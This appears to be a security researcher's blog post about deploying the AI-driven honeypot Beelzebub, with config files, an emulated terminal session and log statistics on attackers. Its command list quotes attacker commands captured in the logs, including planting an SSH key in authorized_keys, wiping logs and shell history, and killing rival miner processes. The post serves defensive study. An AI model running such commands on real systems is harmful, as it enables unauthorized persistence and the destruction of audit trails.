[EN] A Honeypot Story
Hi everyone. In this article, I’ll walk you through my research on an AI-powered honeypot project that I deployed in the cloud to observe various attacker Tactic and Technics.
I built a honeypot in a cloud environment using Beelzebub, an AI-supported honeypot, to evaluate how effective it is—and it performed very well.
Before AI honeypots, you typically had two choices: convert a real machine into a honeypot (very effective but risky), or deploy traditional honeypots (safer but easier for attackers to detect). The core idea of a honeypot is to imitate a real system inside or outside your network so you can observe malicious behavior and act before a real breach occurs. However, depending on your network configuration, attackers may still identify the deception. If you allow outbound internet access, an attacker might leverage it for malicious activity that could harm your organization’s reputation. If you don’t allow outbound access, you either need to simulate realistic responses or accept that the system may be exposed as a honeypot.
This is where AI honeypots step in and say, “Stand up—your father is here!”
This capability meaningfully evolves these systems. Beelzebub supports various protocols including SSH, HTTP, MCP, and MySQL. Here is an example AI-supported SSH config file:
1apiVersion: "v1"
2protocol: "ssh"
3address: ":2222"
4description: "SSH interactive ChatGPT"
5commands:
6 - regex: "^(.+)$"
7 plugin: "LLMHoneypot"
8serverVersion: "OpenSSH"
9serverName: "root"
10passwordRegex: "^(admin123|root123|jenkins123|Admin123|root|admin|test)$"
11deadlineTimeoutSeconds: 6000
12plugin:
13 llmProvider: "openai"
14 llmModel: "gpt-4o-mini"
15 openAISecretKey: "sk-proj-"
Beelzebub allows you to provide a custom prompt, as shown below.
1apiVersion: "v1"
2protocol: "ssh"
3address: ":2222"
4description: "SSH interactive OpenAI GPT-4"
5commands:
6 - regex: "^(.+)$"
7 plugin: "LLMHoneypot"
8serverVersion: "OpenSSH"
9serverName: "ubuntu"
10passwordRegex: "^(root|qwerty|Smoker666|123456|jenkins|minecraft|sinus|alex|postgres|Ly123456)$"
11deadlineTimeoutSeconds: 60
12plugin:
13 llmProvider: "openai"
14 llmModel: "gpt-4o"
15 openAISecretKey: "sk-proj-123456"
16 prompt: "You will act as an Ubuntu Linux terminal. The user will type commands, and you are to reply with what the terminal should show. Your responses must be contained within a single code block."
I tested both approaches, but I prefer the configuration without a prompt unless you have a well-crafted prompt and an appropriate LLM model.
Here are some commands and responses.
1ubuntu@root:~$ ls
2Documents
3Downloads
4Music
5Pictures
6Videos
7
8ubuntu@root:~$ whoami
9user
10
11ubuntu@root:~$ w
12 10:01:20 up 1:01, 1 user, load average: 0.00, 0.01, 0.05
13USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
14user pts/0 192.168.1.2 10:00 1.00s 0.01s 0.00s w
15
16ubuntu@root:~$ echo "1" >> test.txt
17
18ubuntu@root:~$ ls
19Documents
20Downloads
21Music
22Pictures
23test.txt
24Videos
25
26ubuntu@root:~$ cat test.txt
271
28
29ubuntu@root:~$ ping 8.8.8.8
30PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
3164 bytes from 8.8.8.8: icmp_seq=1 ttl=117 time=14.0 ms
3264 bytes from 8.8.8.8: icmp_seq=2 ttl=117 time=13.8 ms
3364 bytes from 8.8.8.8: icmp_seq=3 ttl=117 time=14.2 ms
3464 bytes from 8.8.8.8: icmp_seq=4 ttl=117 time=14.1 ms
35
36--- 8.8.8.8 ping statistics ---
374 packets transmitted, 4 received, 0% packet loss, time 3005ms
38rtt min/avg/max/mdev = 13.8/14.0/14.2/0.2 ms
As you can see, it convincingly emulates a real system.
Here’s a short video demonstrating its capabilities:
Throughout this project, I collected many username–password combinations, scripts, commands, and artifacts from different sources. Below are some of the usernames, passwords, and unique IPs observed.
Unique IPs
1webserver1@webserver1:~/beelzebub/logs$ grep -oE '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' beelzebub.log | sort -u |wc -l
2159
3webserver1@webserver1:~/beelzebub/logs$ grep -oE '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' beelzebub.log | sort -u
4101.126.149.60
5101.36.98.91
6102.88.137.213
7103.107.183.97
8103.148.195.161
9103.171.85.146
10103.172.205.208
11103.173.229.117
12103.174.114.50
13103.213.238.91
14103.241.43.23
15103.243.26.174
16103.26.136.173
17103.31.38.141
18103.45.234.227
19103.48.84.29
20103.56.115.6
21103.90.225.35
22104.215.255.146
23106.12.29.184
24108.65.131.227
25109.230.200.203
26112.118.173.168
27113.7.221.72
28115.190.10.158
29115.190.44.104
30116.193.190.134
31117.216.211.19
32118.163.132.211
33118.195.235.226
34119.36.31.170
35121.165.204.105
36121.37.9.228
37123.139.218.0
38123.240.255.61
39123.253.22.49
401.238.106.229
41124.221.16.51
42125.20.16.22
43125.25.172.245
44125.39.179.192
45125.86.2.69
46125.94.106.195
47128.1.131.163
48132.145.213.106
49134.209.206.143
50139.59.46.176
51140.249.181.31
5214.103.127.58
5314.103.145.231
5414.103.54.150
55142.250.190.14
56144.24.195.5
57146.190.19.87
58151.19.94.164
59151.35.124.229
60151.43.121.249
61151.44.141.61
62151.57.113.223
6315.206.55.26
64154.16.10.170
65156.54.108.185
66157.230.211.219
67159.223.146.141
68159.223.238.134
69159.65.196.99
70160.20.186.237
71161.35.25.59
72162.240.54.168
73163.44.173.168
74165.154.201.122
75167.99.41.9
76169.254.169.254
77172.16.2.10
78172.190.89.127
79172.217.16.46
80175.107.193.10
81175.12.108.55
82176.213.141.182
83176.65.151.22
84176.95.247.26
85179.33.210.213
86180.106.83.59
87180.76.53.187
88181.49.50.6
89182.43.76.19
90182.57.16.58
91183.234.64.3
92183.56.205.82
93183.66.149.42
94185.156.73.233
95185.225.22.80
96185.65.202.184
97186.10.86.130
98189.146.171.237
99192.146.138.58
100192.227.128.4
101192.81.208.35
102194.0.234.21
103195.177.94.29
104195.178.110.30
105196.251.114.14
106197.5.145.150
107201.76.120.30
108203.6.235.111
109206.189.103.33
110206.189.202.201
111210.79.142.221
112211.72.129.211
113211.72.129.212
114218.92.247.138
115221.159.150.85
1162.57.122.177
11727.111.32.174
11827.79.0.78
11934.57.181.41
12038.85.247.104
12140.83.182.122
12241.59.229.33
12342.117.155.28
12443.135.172.68
12543.138.184.249
12643.157.169.99
12745.11.152.12
12845.120.216.232
12945.130.148.125
13045.164.39.253
13145.182.207.45
13245.186.228.252
13345.9.116.195
13446.191.141.152
13547.236.76.100
13647.237.30.186
13749.254.74.18
13851.195.46.102
13951.68.199.166
14051.79.86.83
14152.187.9.8
14257.129.74.123
14357.132.175.132
14459.126.195.45
14564.226.124.227
14671.70.164.48
14777.222.100.142
14878.109.200.135
14978.128.112.74
15080.136.13.254
15180.190.82.51
15280.253.251.63
15380.94.95.116
15480.94.95.118
15581.68.91.167
15685.215.195.9
15789.126.208.241
15889.144.35.100
15989.97.218.142
1609.223.176.221
16194.42.110.21
16295.214.232.18
Most attempted usernames
1webserver1@webserver1:~/beelzebub/logs$ jq -r '.event.User | select(. != null and . != "")' beelzebub.log | sort | uniq -c | sort -rn | head -30
22661 root
3314 ubuntu
4284 admin
5237 user
6184 test
7149 oracle
8136 debian
9128 postgres
1088 mysql
1171 pi
1256 guest
1354 administrator
1452 newuser
1546 adminuser
1645 12345
1744 docker
1841 1234
1940 webadmin
2039 jenkins
2137 password
2235 alex
2333 Welcome123
2433 user123
2533 Password
2633 Jenkins123
2733 ftpuser
2833 1234567
2932 ubuntu123
3032 Smoker666
3132 P@ssw0rd
Most attempted passwords
1webserver1@webserver1:~/beelzebub/logs$ jq -r '.event.Password | select(. != null and . != "")' beelzebub.log | sort | uniq -c | sort -rn | head -30
21023 123456
3895 password
4889 12345
5867 123456789
6767 iloveyou
7764 princess
8215 1234
9137 123
10111 root
11105 alex
12103 postgres
1399 sinus
1499 minecraft
1599 Ly123456
1694 qwerty
1792 admin
1870 1q2w3e4r
1967 jenkins
2065 password1
2159 admin123
2255 12345678
2348 1234567890
2445 Admin123
2545 123abc
2643 qwerty123
2743 654321
2840 test
2940 pass123
3040 123123
3137 1234567
Most executed commands
1webserver1@webserver1:~/beelzebub/logs$ jq -r '.event.Command | select(. != null and . != "")' beelzebub.log | sort | uniq -c | sort -rn | head -50
241 ls
311 uname -a
410 whoami
59 pwd
68 w
78 uname -m
86 cd ~; chattr -ia .ssh; lockr -ia .ssh
95 uname
105 top
115 ls -lh $(which ls)
125 lscpu | grep Model
135 free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
145 df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
155 crontab -l
165 cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
175 cat /proc/cpuinfo | grep processor | wc -l
185 cat /proc/cpuinfo | grep name | wc -l
195 cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
205 cat /proc/cpuinfo | grep model | grep name | wc -l
214 rm -rf .bash_history;rm -rf /var/run/utmp;rm -rf /var/run/wtmp -;rm -rf /var/log/lastlog;rm -rf /usr/adm/lastlog;rm -rf .bash_history;cd /home;rm -rf yum.log;cd /var/log/;rm -rf wtmp;rm -rf secure;rm -rf lastlog;rm -rf messages;touch messagess;touch wtmp;touch secure;touch lastlog;cd /root;rm -rf .bash_history;touch .bash_history;unset HISTFILE;unset HISTSAVE;history -n;unset WATCH;cd;HISTFILE=/dev/null;history -c && rm -f ~/.bash_history;cd ..
224 ping 8.8.8.8
234 passwd
244 cat /etc/passwd
253 ll
263 cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > netai
272 uname -s -v -n -r -m
282 uname -r | awk '{printf $1}'
292 uname -n | awk '{printf $1}'
302 uname -m | awk '{printf $1}'
312 nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | wc -l | head -c 1
322 nvidia-smi -q | grep "Product Name"
332 nproc
342 lspci | egrep VGA && lspci | grep 3D
352 kill -9 $(ps aux | grep xrx |grep -v grep | awk '{print $2}');kill -9 $(ps aux | grep biden1 |grep -v grep | awk '{print $2}');kill -9 $(ps aux | grep zzh |grep -v grep | awk '{print $2}');kill -9 $(ps aux | grep arx645 |grep -v grep | awk '{print $2}');kill -9 $(ps aux | grep kthreaddk |grep -v grep | awk '{print $2}');kill -9 $(ps aux | grep ab |grep -v grep | awk '{print $2}');kill -9 $(ps aux | grep kdevtmpfsi |grep -v grep | awk '{print $2}')
362 cd
371 uname -s -m
381 uname -s
391 /tmp/kal64
401 /tmp/amd64
411 sudo su
421 sudo -l
431 sh -c 'for d in /dev/shm /tmp /var/run /mnt /root /; do cd "$d" 2>/dev/null && pwd && break; done'
441 sdv
451 scp -t /var/tmp/8ixni5b4yfecmq07ecilanp4ug
461 scp -t /usr/local/bin/8ixni5b4yfecmq07ecilanp4ug
471 scp -t /usr/bin/8ixni5b4yfecmq07ecilanp4ug
As shown above, attackers commonly attempted to fingerprint the system (often to assess cryptojacking potential), upload SSH keys for persistence, and run reconnaissance or cleanup commands.
I will write detailed posts about specific attacks to show what happens behind the scenes.
Thank you for taking the time to read this article—I hope you find it useful.
Keep up the good work.